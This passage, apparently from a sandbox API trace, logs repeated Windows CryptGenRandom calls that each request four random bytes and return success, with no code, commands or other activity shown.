pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, 